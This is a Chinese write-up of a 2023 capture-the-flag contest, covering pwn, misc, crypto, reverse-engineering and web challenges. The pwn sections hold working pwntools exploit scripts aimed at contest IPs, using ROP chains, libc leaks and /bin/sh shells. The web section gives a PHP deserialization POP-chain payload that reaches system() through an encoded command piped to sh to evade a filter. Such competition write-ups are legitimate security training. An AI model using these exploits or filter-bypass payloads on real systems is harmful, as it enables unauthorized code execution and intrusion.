PWN
Move
栈迁移
from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
elf=ELF('pwn')
libc=ELF('./libc-2.27.so')
#p = process(["./ld-2.27.so", "./a"],env={"LD_PRELOAD":"./libc-2.27.so"})
#p=process('./pwn',env={'LD_PRELOAD':'./libc-2.27.so'})
#p=process('./pwn')
p=remote('47.93.188.210',21562)
p.recvuntil('avel again!n')
rdi=0x0000000000401353
pay=p64(rdi)+p64(0x404018)+p64(0x0401080)+p64(0x0401264)
p.send(pay)
p.recvuntil('Input your setp number')
p.send(p32(0x12345678))
p.recvuntil('TaiCooLa')
pay='b'*0x30+p64(0x4050A0-8)+p64(0x40124b)
#gdb.attach(p,'b *0x0401241nb *0x0401264')
raw_input()
p.send(pay)
puts=u64(p.recv(6).ljust(8,'x00'))
print hex(puts)
#######################
libcbase=puts-libc.sym['puts']
one=libcbase+0x4f302
print hex(one)
#p.recvuntil('avel again!n')
#pay=p64(rdi)+p64(0x404018)+p64(0x0401080)+p64(0x0401230)
p.send(p64(one)+'aaaaaaaaaa')
p.interactive()
Pwthon
格式化泄露,栈溢出
from pwn import*
context(os='linux',arch='amd64')
context.log_level=True
libc=ELF('./libc-2.27.so')
p=remote('123.56.25.124',43289)
p.recvuntil('>')
p.sendline('0')
p.recvuntil('Give you a gift ')
leak=int(p.recv(14),16)
libcbase=leak-0x68B0
p.sendline('%p '*37)
p.recvuntil('0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0x2520702520702520 0x2070252070252070 0x7025207025207025 0xa20702520702520 ')
stack=int(p.recv(14),16)
p.recvuntil('0x7 0x4 ')
canary=int(p.recv(18),16)
print hex(canary)
print hex(leak)
print hex(libcbase)
print hex(stack)
p.recv()
rdi=leak-(0x068B0-0x0000000000003f8f)
rsi=leak-(0x068B0-0x0000000000003cd9)
main=leak+(0x99F0-0x068B0)
read=leak-(0x068B0-0x3940)
open=leak-(0x068B0-0x3AE0)
puts=leak-(0x068B0-0x3710)
puts_got=leak-(0x068B0-0x16078)
write=libcbase+0x3760
pay='./flagx00x00'*33+p64(canary)+p64(0)+p64(rdi)+p64(stack-0x100)+p64(rsi)+p64(2)+p64(open)
pay+=p64(rdi)+p64(0)+p64(rsi)+p64(stack-0x100)+p64(read)+p64(rdi)+p64(stack-0x100)+p64(puts)
pay='12345678'*33+p64(canary)+p64(0)+p64(rdi)+p64(puts_got)+p64(puts)+p64(main)
p.send(pay)
p.recv(1)
puts_libc=u64(p.recv(6).ljust(8,'x00'))
print hex(puts_libc)
libcbase=puts_libc-libc.sym['puts']
#####################################
#p.interactive()
##############################
#p.recvuntil('>')
#p.sendline('0')
p.recv()
#leak=int(p.recv(14),16)
p.sendline('aaaa')
p.recv()
binsh=libcbase+next(libc.search('/bin/sh'))
system=libcbase+libc.sym['system']
rdx=libcbase+0x0000000000001b96
ret=libcbase+0x00000000000008aa
pay='aaaaaaaa'*33+p64(canary)+p64(0)+p64(rdi)+p64(0)+p64(rsi)+p64(stack)+p64(read)+p64(rdi)+p64(stack)
pay+=p64(rsi)+p64(2)+p64(open)+p64(rdi)+p64(3)+p64(rsi)+p64(stack)+p64(read)+p64(rdi)+p64(stack)+p64(puts)
pay='./flagx00x00'*33+p64(canary)+p64(0)+p64(rdi)+p64(stack-0x100)+p64(rsi)+p64(2)+p64(open)
pay='aaaaaaaa'*33+p64(canary)+p64(0)+p64(rdi)+p64(binsh)+p64(ret)+p64(system)
print hex(libcbase)
p.send(pay)
p.recv()
#p.send('./flagx00x00')
'''
with open("file.txt", "w") as file:
file.write(p.recvuntil('</html>'))
'''
p.interactive()
Misc
pintu
首先图片的高度可以转成字符,根据题目tips,转成8进制,然后数字转字符和Base32后得到一串Base64
from PIL import Image
import base64
import os
w = os.walk('./pintu/')
fns = []
for pa, dr, fl in w:
for f in fl:
fns += [os.path.join(pa, f)]
#print(fns)
def fncmp(a):
aa = int(a.split('.')[1][7:])
return aa
fns = sorted(fns, key=fncmp)
sizes = []
for f in fns:
img = Image.open(f)
size = img.size
sizes += [size]
if size[0] != 65:
print(size)
print(len(sizes))
res = ''
for s in sizes:
res += chr(int(str(s[1]), 8))
res = ''.join([chr(int(x)) for x in res.split(' ')])
res = base64.b32decode(res)
#res = base64.b64decode(res)
print(res)
print(len(res))
```
b'LK1vE7eNJu8g1GRUdM5UE0QKLuKK1k5UdMKNdM5UdKKcdM7UdM5UMIPcnMXUdM5UMc5vEK15IvDqm6Dqnk7um6DlXuuqCuXUm6DqdBndm6RNMvDqdM5um6RNdMuqnk5Um6DldM5dm6RUMvRUdM5udBnUdM5NdM5Unk7UdM5QXu5UEMdqm6DldM5UXu7tE6RTdM5Udb8pjuKXK0ukLbu6KB0LEuXedB45i5nJJ/aIKvxqJBXStMXH1kRuKGTGtVRuIru6jMaXKBQpL7nkLB1uQV0mtKeGIrKMKI0VEMPqMNQFKtRPMV4HANUKMM5XnIKmd/V79V5HM/eeMKQCiu1uQEoqKK3wi5KHdy0wL5U6t702KMJZjM01ncXaMkRHjulwd09lM68xigKJ9b4vL75L37VNtgKeJ/5pJV12KuM6Qg199Va2L7at9EeciMXrMKQJ97nvQknrKw5yQI82nG7SIMPU1VPCib4K1GabiM4dIg4w3rQC3BKXnG00tM0EM05xIy1mKc0TJ7u7MVxNtG0t3baQXyowENeyEw11CB4rnVXAQbxwCrKp3GaAir7VIVnAtNaS374TJb12mGK/tcoGtEnuirKaMwVkjBVpEw4l3u8wXEn11VKPdKS69b8PnN4HJk2qEVQ0iIdwKB4aib4vJNQ4mkRS37a/tbaPQMe/J/QIXr4ztgS7IE9qM/sN1GXSi01Kjw4AIuDPnMkZLg3p1E569M2wAN5FjIXMncKVKM4FtNK7Qw1dn0o7iE5XJNQf1c4IjBoNiy07igXHKB3TjblPEkK6IbRlM5ae9MxZjIeFXV71JkP8JrnxX50yX/58Kb0Ijb1kmk9qMt85JGX03E5hKI5EnN4hEu7M3MamCIRaXk7V37083/4Bdb9lXMlp3KU4iB9NKcSpL6R6Xc16nk8b3G971VR8dM5UdM55ju1ML7Q7MI7cd6so1r5k9EaajI5/1tRZjb3Y9b5w1E9k'
```
直接解Base64发现乱码
所以去看图片的颜色,转成二进制,补个0后前几个刚好是flag对应的ASCII,而且补完后数量刚好可以整除8,于是
from PIL import Image
import base64
import os
w = os.walk('./pintu/')
fns = []
for pa, dr, fl in w:
for f in fl:
fns += [os.path.join(pa, f)]
#print(fns)
def fncmp(a):
aa = int(a.split('.')[1][7:])
return aa
fns = sorted(fns, key=fncmp)
sizes = []
px = []
for f in fns:
img = Image.open(f)
size = img.size
sizes += [size]
if size[0] != 65:
print(size)
px += [img.getpixel((0, 0))[0] // 255]
print(len(sizes))
px = [0] + px
test = []
for i in range(0, len(px), 8):
#print(px[i: i+8])
test += [chr(int(''.join([str(x) for x in px[i: i+8]]), 2))]
print(test)
```
4703
['f', 'l', 'a', 'g', 'ç', 'x9c', 'x8b', 'å', 'x88', '°', '6', '6', '6', 'c', 'æ', 'x98', '¯', 'ä', '¸', 'x8d', 'æ', 'x98', '¯', 'ç', 'x89', '¹', 'å', 'x88', '«', 'å', 'x85', '´', 'å', '¥', 'x8b', 'ï', '¼', 'x8c', 'å', '¾', 'x88', 'å', 'x8f', '¯', 'æ', 'x83', 'x9c', 'f', 'l', 'a', 'g', 'å', '¹', '¶', 'ä', '¸', 'x8d', 'å', 'x9c', '¨', 'è', '¿', 'x99', 'ã', 'x80', 'x82', 'ï', '¼', 'x88', 'ç', 'x8b', 'x97', 'å', '¤', '´', 'ä', '¿', 'x9d', 'å', 'x91', '½', 'ï', '¼', 'x89', 'ï', '¼', 'x8c', 'æ', 'x97', '¢', 'ç', 'x84', '¶', 'è', 'µ', '°', 'å', 'x88', '°', 'ä', 'º', 'x86', 'è', '¿', 'x99', 'é', 'x87', 'x8c', 'ï', '¼', 'x8c', 'é', 'x82', '£', 'æ', 'x88', 'x91', 'ä', '¹', 'x9f', 'ç', '»', 'x99', 'ä', '¸', 'x80', 'ä', '¸', 'ª', 'é', 'x80', 'x9a', 'å', 'x85', '³', 'ç', 'x9a', 'x84', 'å', 'x85', '³', 'é', 'x94', '®', 'ä', '¿', '¡', 'æ', 'x81', '¯', 'æ', 'x8b', '¿', 'å', 'x8e', '»', 'å', 'x90', '§', 'ï', '¼', 'x8c', 'å', 'x8e', '»', 'æ', 'x89', '¾', 'å', 'x88', '°', 'ç', 'x9c', 'x9f', 'æ', 'xad', '£', 'ç', 'x9a', 'x84', 'f', 'l', 'a', 'g', 'å', 'x90', '§', 'ï', '¼', 'x9a', 's', 'U', 'v', 'c', 'u', '5', 'r', 'g', 'S', 'e', 'A', 'm', 'J', 'Q', 'C', 'f', 'd', 'X', 't', 'E', 'M', 'K', 'I', 'B', '9', '1', 'L', 'j', '3', 'n', 'i', 'O', 'o', '4', 'h', 'y', 'V', '0', 'b', '/', '2', 'a', 'z', 'p', 'x', '8', 'H', 'q', 'Z', 'P', '6', 'w', 'k', '7', 'G', 'N', 'l', 'T', 'F', 'Y', 'D', 'R', '+', 'W', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', 'å', 'x93', 'x8e', 'ï', '¼', 'x8c', 'å', '¯', '¹', 'ä', 'º', 'x86', 'ã', 'x80', 'x82', 'æ', 'x8b', '¿', 'è', 'µ', '°', 'ä', '¹', 'x8b', 'å', 'x89', 'x8d', 'ç', 'x9c', 'x8b', 'ä', '¸', 'x80', 'ç', 'x9c', 'x8b', 'æ', 'x88', 'x91', 'ç', '²', '¾', 'å', '¿', 'x83', 'æ', 'x8c', 'x91', 'é', 'x80', 'x89', 'ç', 'x9a', 'x84', 'ç', '¬', 'x91', 'è', '¯', 'x9d', 'å', 'x90', '§', 'ï', '¼', 'x9a', 'ç', 'x8c', 'x8e', 'ä', 'º', 'º', 'æ', 'x89', 'x93', 'ç', 'x8c', 'x8e', 'ï', '¼', 'x8c', 'æ', 'x9c', 'x9d', 'ç', 'x8b', 'x90', 'ç', 'x8b', '¸', 'å', '¼', 'x80', 'æ', 'x9e', 'ª', 'ï', '¼', 'x8c', 'â', 'x80', 'x9c', 'ç', 'xa0', '°', 'â', 'x80', 'x9d', 'å', 'x9c', '°', 'ä', '¸', 'x80', 'å', '£', '°', 'æ', 'x9e', 'ª', 'å', 'x93', 'x8d', 'ä', '¹', 'x8b', 'å', 'x90', 'x8e', 'ç', 'x8c', 'x8e', 'ä', 'º', 'º', 'æ', 'xad', '»', 'ä', 'º', 'x86', 'ã', 'x80', 'x82', 'ç', 'x8b', 'x90', 'ç', 'x8b', '¸', 'å', 'x8f', 'x89', 'ç', 'x9d', 'x80', 'è', 'x85', '°', 'ï', '¼', 'x8c', 'å', 'x86', '·', 'ç', '¬', 'x91', 'ä', '¸', 'x80', 'å', '£', '°', 'ï', '¼', 'x9a', 'n', 'â', 'x80', 'x9c', 'æ', '²', '¡', 'æ', 'x83', '³', 'å', 'x88', '°', 'å', 'x90', '§', 'ï', '¼', 'x8c', 'æ', 'x88', 'x91', 'æ', 'x98', '¯', 'å', 'x8f', 'x8d', 'å', '°', 'x84', 'å', '¼', '§', 'ã', 'x80', 'x82', 'â', 'x80', 'x9d', 'å', '¥', '½', 'ä', '¸', 'x8d', 'å', '¥', '½', 'ç', '¬', 'x91', 'ï', '¼', 'x8c', ' ', 'æ', 'x9c', 'x89', 'æ', '²', '¡', 'æ', 'x9c', 'x89', 'æ', 'x84', 'x9f', 'è', '§', 'x89', 'ä', '¸', 'x80', 'å', 'x93', 'x86', 'å', 'x97', '¦', 'ï', '¼', 'x8c', 'å', '¤', '§', 'è', 'x84', 'x91', 'æ', 'x9b', '´', 'æ', '¸', 'x85', 'æ', 'x99', '°', 'ä', 'º', 'x86', 'ã', 'x80', 'x82', 'à', '¸', 'x85', 'Õ', 'x9e', 'â', 'x80', '¢', 'ï', '»', 'x8c', 'â', 'x80', '¢', 'Õ', 'x9e', ' ', 'à', '¸', 'x95']
```
中间刚好夹着一个Base64的表
sUvcu5rgSeAmJQCfdXtEMKIB91Lj3niOo4hyV0b/2azpx8HqZP6wk7GNlTFYDR+W
换表解Base64,是一个图片
import base64
c = 'LK1vE7eNJu8g1GRUdM5UE0QKLuKK1k5UdMKNdM5UdKKcdM7UdM5UMIPcnMXUdM5UMc5vEK15IvDqm6Dqnk7um6DlXuuqCuXUm6DqdBndm6RNMvDqdM5um6RNdMuqnk5Um6DldM5dm6RUMvRUdM5udBnUdM5NdM5Unk7UdM5QXu5UEMdqm6DldM5UXu7tE6RTdM5Udb8pjuKXK0ukLbu6KB0LEuXedB45i5nJJ/aIKvxqJBXStMXH1kRuKGTGtVRuIru6jMaXKBQpL7nkLB1uQV0mtKeGIrKMKI0VEMPqMNQFKtRPMV4HANUKMM5XnIKmd/V79V5HM/eeMKQCiu1uQEoqKK3wi5KHdy0wL5U6t702KMJZjM01ncXaMkRHjulwd09lM68xigKJ9b4vL75L37VNtgKeJ/5pJV12KuM6Qg199Va2L7at9EeciMXrMKQJ97nvQknrKw5yQI82nG7SIMPU1VPCib4K1GabiM4dIg4w3rQC3BKXnG00tM0EM05xIy1mKc0TJ7u7MVxNtG0t3baQXyowENeyEw11CB4rnVXAQbxwCrKp3GaAir7VIVnAtNaS374TJb12mGK/tcoGtEnuirKaMwVkjBVpEw4l3u8wXEn11VKPdKS69b8PnN4HJk2qEVQ0iIdwKB4aib4vJNQ4mkRS37a/tbaPQMe/J/QIXr4ztgS7IE9qM/sN1GXSi01Kjw4AIuDPnMkZLg3p1E569M2wAN5FjIXMncKVKM4FtNK7Qw1dn0o7iE5XJNQf1c4IjBoNiy07igXHKB3TjblPEkK6IbRlM5ae9MxZjIeFXV71JkP8JrnxX50yX/58Kb0Ijb1kmk9qMt85JGX03E5hKI5EnN4hEu7M3MamCIRaXk7V37083/4Bdb9lXMlp3KU4iB9NKcSpL6R6Xc16nk8b3G971VR8dM5UdM55ju1ML7Q7MI7cd6so1r5k9EaajI5/1tRZjb3Y9b5w1E9k'
iniTable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
nowTable = ''.join(['s', 'U', 'v', 'c', 'u', '5', 'r', 'g', 'S', 'e', 'A', 'm', 'J', 'Q', 'C', 'f', 'd', 'X', 't', 'E', 'M', 'K', 'I', 'B', '9', '1', 'L', 'j', '3', 'n', 'i', 'O', 'o', '4', 'h', 'y', 'V', '0', 'b', '/', '2', 'a', 'z', 'p', 'x', '8', 'H', 'q', 'Z', 'P', '6', 'w', 'k', '7', 'G', 'N', 'l', 'T', 'F', 'Y', 'D', 'R', '+', 'W'])
png = base64.b64decode(c.translate(str.maketrans(nowTable, iniTable)))
png = base64.b64decode(png.split(b' data:')[0])
print(png)
with open('res.png', 'wb') as f:
f.write(png)
Piet解,得flag
flag{4b6c1737-27e5-41c4-95e3-f70ad196063e}
Crypto
lift
首先hint就是,然后可以恢复
小,先盲猜一波Wiener,根据https://tover.xyz/p/LLL-attack-equation/#Wiener%E6%94%BB%E5%87%BB,Wiener和格互通,所以构造格()
LLL规约后可以解出,对短向量两个元素做gcd得,然后分解
接着解密,然后开个次方即可
hint = 251
N = 108960799213330048807537253155955524262938083957673388027650083719597357215238547761557943499634403020900601643719960988288543702833581456488410418793239589934165142850195998163833962875355916819854378922306890883033496525502067124670576471251882548376530637034077
E = 3359917755894163258174451768521610910491402727660720673898848239095553816126131162471035843306464197912997253011899806560624938869918893182751614520610693643690087988363775343761651198776860913310798127832036941524620284804884136983215497742441302140070096928109039
c = 72201537621260682675988549650349973570539366370497258107694937619698999052787116039080427209958662949131892284799148484018421298241124372816425123784602508705232247879799611203283114123802597553853842227351228626180079209388772101105198454904371772564490263034162
g = hint
assert E % g == 0
e = E // g
D = 2^256
B = matrix(ZZ, [
[1, D * e],
[0, - D * N * g^2]
])
L = B.LLL()
pq = gcd(L[0][0], L[0][1])
assert N % pq == 0
p4 = N // pq
from gmpy2 import iroot
p = iroot(p4, 4)
assert p[1]
p = Integer(p[0])
q = N // p^5
assert p^5 * q == N
print('p = %d' % p)
print('q = %d' % q)
phi = p^4 * (p - 1) * (q - 1)
d = e.inverse_mod(phi)
mg = pow(c, d, N)
# https://tover.xyz/p/n-root-in-F/#%E6%A8%A1%E6%9D%BF
load('./nth.sage')
import libnum
for m in nthRSA_p(mg, g, p, 5):
flag = libnum.n2s(int(m))
if b'flag' in flag:
print(flag)
# b'flag{4b68c7eece6be865f6da2a4323edd491}x9dxcfxdcxcbxb8xbddxecxadhxa6Cx99xa0)7xfbx02xbax90q8x10+x7f}'
Reverse
URL从哪儿来
可以看到取了一个资源做xor,于是去.rsrc段找到这个资源,xor还原
with open('rsrc', 'rb') as f:
rsrc = f.read()
data = []
for i in range(len(rsrc)):
if rsrc[i] != 0 and rsrc[i] != 0x78:
data.append(rsrc[i] ^ 0x78)
else:
data.append(rsrc[i])
with open('out', 'wb') as f:
f.write(bytes(data))
还原以后是个exe,放进ida里看逻辑,就是个base64解码
写脚本解密有:
import base64
v3 = [120, 139, 150, 134, 120, 81, 145, 80, 108, 98, 119, 83, 108, 136, 99, 80, 120, 113, 78, 80, 107, 152, 119, 83, 106, 114, 119, 151, 108, 139, 119, 146, 108, 152, 99, 80, 109, 113, 78, 81, 108, 98, 119, 150, 108, 152, 95, 80, 107, 114, 129, 81, 108, 136, 100, 87]
for i in range(len(v3)):
v3[i] -= 30
print(base64.b64decode(bytes(v3).decode()))
# b'flag{6469616e-6369-626f-7169-746170617761}'
hello_py
apk解包能看到在assert/chaquopy文件夹下有app.imy,看文件头发现是压缩包,继续解压可以拿到一个混淆的hello.py,所以就是一个python逆向,逻辑就是把字符变成小端序数组、xxtea加密最后比对,反过来写解密脚本即可。
# from java import jboolean ,jclass #line:1
import struct #line:3
import ctypes #line:4
def MX (z,y,sum,key,p,e):#line:7
OOO000O0O0OO00000 =(z.value >>5 ^y.value <<2 )+(y.value >>3 ^z.value <<4 )#line:8
OOO0OOOOOO0O0OO00 =(sum.value ^y.value )+(key[(p&3 )^e.value ]^z.value )#line:9
return ctypes .c_uint32 (OOO000O0O0OO00000 ^OOO0OOOOOO0O0OO00 )#line:11
def encrypt (n,v ,key ):#line:14
delta =0x9e3779b9 #line:15
rounds =6 +52 //n#line:16
sum =ctypes .c_uint32 (0 )#line:18
z =ctypes .c_uint32 (v [n-1 ])#line:19
e =ctypes .c_uint32 (0 )#line:20
while rounds >0 :#line:22
sum .value +=delta #line:23
e .value =(sum .value >>2 )&3 #line:24
for i in range (n-1 ):#line:25
y =ctypes .c_uint32 (v [i +1 ])#line:26
v [i ]=ctypes .c_uint32 (v [i ]+MX (z ,y ,sum ,key ,i ,e ).value ).value #line:27
z .value =v [i ]#line:28
y =ctypes .c_uint32 (v [0 ])#line:29
v [n-1 ]=ctypes .c_uint32 (v [n-1 ]+MX (z ,y ,sum ,key ,n-1 ,e ).value ).value #line:30
z .value =v [n-1 ]#line:31
rounds -=1 #line:32
return v #line:34
def check (s ):#line:63
print ("checking~~~: "+s )#line:64
s =str (s )#line:65
if len (s )!=36 :#line:66
return False#line:67
arr1 =[]#line:69
for i in range (0 ,36 ,4 ):#line:70
OO0OO0OOO000OO0O0 =s [i :i +4 ].encode ('latin-1')#line:71
arr1 .append (OO0OO0OOO000OO0O0 )#line:72
arr2 =[]#line:73
for i in arr1 :#line:74
arr2 .append (struct .unpack ("<I",i )[0 ])#line:75
# print (arr2 )#line:77
OO0OO0OOO000OO0O0 =encrypt (9 ,arr2 ,[12345678 ,12398712 ,91283904 ,12378192 ])#line:78
OOOOO0OOO0OO00000 =[689085350 ,626885696 ,1894439255 ,1204672445 ,1869189675 ,475967424 ,1932042439 ,1280104741 ,2808893494 ]#line:85
for i in range (9 ):#line:86
if OOOOO0OOO0OO00000 [i ]!=OO0OO0OOO000OO0O0 [i ]:#line:87
return False #line:88
return True #line:90
def sayHello ():#line:92
print ("hello from py")#line:93
def decrypt(n, v, key):
delta = 0x9e3779b9
rounds = 6 + 52//n
sum = ctypes.c_uint32(delta * rounds)
e = ctypes.c_uint32(0)
y = ctypes.c_uint32(v[0])
while rounds > 0:
e.value = (sum.value >> 2) & 3
for i in range(n-1, 0, -1):
z = ctypes.c_uint32(v[i-1])
v[i] = ctypes.c_uint32(v[i] - MX(z, y, sum, key, i, e).value).value
y.value = v[i]
z = ctypes.c_uint32(v[n-1])
v[0] = ctypes.c_uint32(v[0] - MX(z, y, sum, key, 0, e).value).value
y.value = v[0]
sum.value -= delta
rounds -= 1
return v
def getFlag():
dst = [689085350 ,626885696 ,1894439255 ,1204672445 ,1869189675 ,475967424 ,1932042439 ,1280104741 ,2808893494 ]#line:85
flag = decrypt(9, dst, [12345678, 12398712, 91283904, 12378192])
flag = [struct.pack("<I", x) for x in flag]
flag = b''.join(flag).decode('latin-1')
# print(check(flag))
print(flag)
getFlag()
# c1f8ace6-4b46-4931-b25b-a1010a89c592
WEB
PHP_unserialize_pro
进去容器地址,得到源代码
通过代码审计我们可以得知:
-
定义了一个名为 Welcome的类,其中包含一个构造函数和一个析构函数。构造函数设置$this->name为'Wh0 4m I?',析构函数检查$this->name是否为'A_G00d_H4ck3r',如果是,则输出$this->arg。 -
定义了一个名为 G00d的类,实现了__invoke方法。这个方法检查传入的命令是否包含特定的字符(/f|l|a|g|*|?/i),如果是,则输出"U R A BAD GUY"并结束程序。 -
定义了一个名为 H4ck3r的类,实现了__toString方法。这个方法调用$this->func并输出结果。
接下来,代码检查$_GET['data']是否设置。如果设置,则对$_GET['data']进行反序列化(unserialize);否则,高亮显示当前文件(highlight_file(__FILE__))。
要绕过,我们需要找到一种方法来触发Welcome类的析构函数,使其输出$this->arg。我们可以通过构造一个H4ck3r对象并将其转换为字符串来实现这一点。为了构造H4ck3r对象,我们需要创建一个G00d对象,并设置其shell和cmd属性。同时我们也需要在URL中添加data参数并传递一个有效的序列化对象。
所以编写的POC时候需要:
-
1.定义三个类:Welcome、G00d 和 H4ck3r。最后调用了 serialize(w 序列化为字符串并输出。 -
2.Welcome 类包含两个属性:name 和 arg。G00d 类包含三个属性:shell、cmd 和一个名为 __invoke 的方法。H4ck3r 类包含一个名为 func 的属性。 -
3.创建 Welcome、G00d 和 H4ck3r 类的实例,并将它们关联起来:h; g; $g->cmd='echo "156154405752"|sh';
最后,调用 serialize($w) 函数输出序列化后的字符串。
POC:
<?php
class Welcome{
public $name="A_G00d_H4ck3r";
public $arg ;
}
class G00d{
public $shell="system";
public $cmd;
public function __invoke(){
$shell = $this->shell;
$cmd = $this->cmd;
if(preg_match('/f|l|a|g|*|?/i', $cmd)){
die("U R A BAD GUY");
}
eval($shell($cmd));
}
}
class H4ck3r{
public $func;
}
$g=new G00d();
$h=new H4ck3r();
$w=new Welcome();
$w->arg=$h;
$h->func=$g;
$g->cmd='echo "156154405752"|sh';
echo serialize($w);
?>
运行成功得到一串经过序列化的字符
添加到URL后面得到flag
原文始发于微信公众号(山石网科安全技术研究院):2023第三届香山杯线上初赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论